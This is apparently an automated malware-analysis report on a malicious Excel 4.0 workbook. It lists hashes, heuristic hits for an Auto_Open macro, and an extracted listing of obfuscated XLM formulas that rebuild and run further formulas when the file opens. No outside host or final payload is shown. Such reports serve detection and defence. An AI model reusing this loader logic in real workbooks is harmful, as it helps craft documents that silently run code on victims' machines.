Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4bcc525a3a7bf6e8…

MALICIOUS

Office (OLE)

35.5 KB Created: 2020-11-25 10:42:40 Authoring application: Microsoft Excel First seen: 2020-12-25
MD5: 5be091241118002ba6ba37d43b44c0a9 SHA-1: 71d95f4cde90252fe94326baf61f406a7498168c SHA-256: 4bcc525a3a7bf6e81478401f44c18f6126df654d1983626a98742dcffee61c71
140 Risk Score

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6479 bytes
SHA-256: e5e3846047c1246d2023c6b0073ae0060c285aa813eb0d1e208d13f0cfe0d4ee
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     16 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  XhudMIY
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!B179 
' 0018     22 LABEL : Cell Value, String Constant - cbBngbZ len=0 
' 0018     23 LABEL : Cell Value, String Constant - dQlANpno len=0 
' 0018     25 LABEL : Cell Value, String Constant - evjYXqlYFw len=0 
' 0018     20 LABEL : Cell Value, String Constant - JDdPd len=0 
' 0018     23 LABEL : Cell Value, String Constant - jRXcKwUG len=0 
' 0018     25 LABEL : Cell Value, String Constant - lxjlvkCeCW len=0 
' 0018     26 LABEL : Cell Value, String Constant - nlilgZtpEOc len=0 
' 0018     26 LABEL : Cell Value, String Constant - NSGxTSvQhNd len=0 
' 0018     21 LABEL : Cell Value, String Constant - OdFtBn len=0 
' 0018     24 LABEL : Cell Value, String Constant - oEfkgEeJp len=0 
' 0018     24 LABEL : Cell Value, String Constant - OyhNUEAYo len=0 
' 0018     25 LABEL : Cell Value, String Constant - quLzKlSXEG len=0 
' 0018     27 LABEL : Cell Value, String Constant - sVFgPxfDuXsY len=0 
' 0018     22 LABEL : Cell Value, String Constant - tevHNNu len=0 
' 0018     25 LABEL : Cell Value, String Constant - ubUpSMYfYT len=0 
' 0018     20 LABEL : Cell Value, String Constant - wCSUW len=0 
' 0018     20 LABEL : Cell Value, String Constant - wngAD len=0 
' 0018     21 LABEL : Cell Value, String Constant - XnxUlZ len=0 
' 0018     22 LABEL : Cell Value, String Constant - zJHIlnk len=0 
' 0018     23 LABEL : Cell Value, String Constant - ZMXYXEOq len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  XhudMIY,B89,"SET.NAME("wngAD",VALUE("0"))",""
'  XhudMIY,B92,"SET.NAME("XnxUlZ",wngAD)",""
'  XhudMIY,B94,"SET.NAME("wCSUW",wngAD)",""
'  XhudMIY,B98,"SET.NAME("JDdPd",COUNTA(oEfkgEeJp))",""
'  XhudMIY,B100,"SET.NAME("jRXcKwUG",COUNTA(OdFtBn))",""
'  XhudMIY,B103,[],""
'  XhudMIY,B108,"SET.NAME("dQlANpno","")",""
'  XhudMIY,B113,"XnxUlZ",""
'  XhudMIY,B116,"SET.NAME("sVFgPxfDuXsY",HLOOKUP("*",oEfkgEeJp,XnxUlZ,FALSE))",""
'  XhudMIY,B118,"cbBngbZ",""
'  XhudMIY,B123,"SET.NAME("OyhNUEAYo",wngAD)",""
'  XhudMIY,B125,[],""
'  XhudMIY,B127,"OyhNUEAYo",""
'  XhudMIY,B131,"ubUpSMYfYT",""
'  XhudMIY,B135,"nlilgZtpEOc",""
'  XhudMIY,B139,"quLzKlSXEG",""
'  XhudMIY,B141,"SET.NAME("evjYXqlYFw",VALUE(HLOOKUP("*",OdFtBn,quLzKlSXEG,FALSE)))",""
'  XhudMIY,B145,"lxjlvkCeCW",""
'  XhudMIY,B149,"dQlANpno",""
'  XhudMIY,B154,"wCSUW",""
'  XhudMIY,B159,NEXT(),""
'  XhudMIY,B163,"tevHNNu",""
'  XhudMIY,B165,"SET.NAME("f",INT(T(FORMULA(T(dQlANpno)&"",""&T(tevHNNu)))))",""
'  XhudMIY,B168,"NSGxTSvQhNd",""
'  XhudMIY,B172,NEXT(),""
'  XhudMIY,B174,RETURN(),""
'  XhudMIY,B206,"SET.NAME("zJHIlnk",B89)",""
'  XhudMIY,B211,"oEfkgEeJp",""
'  XhudMIY,B213,"SET.NAME("OdFtBn",R98C12)",""
'  XhudMIY,B215,"SET.NAME("NSGxTSvQhNd",221)",""
'  XhudMIY,B218,"SET.NAME("ZMXYXEOq",2)",""
'  XhudMIY,B220,zJHIlnk(),""
'  XhudMIY,B221,HALT(),""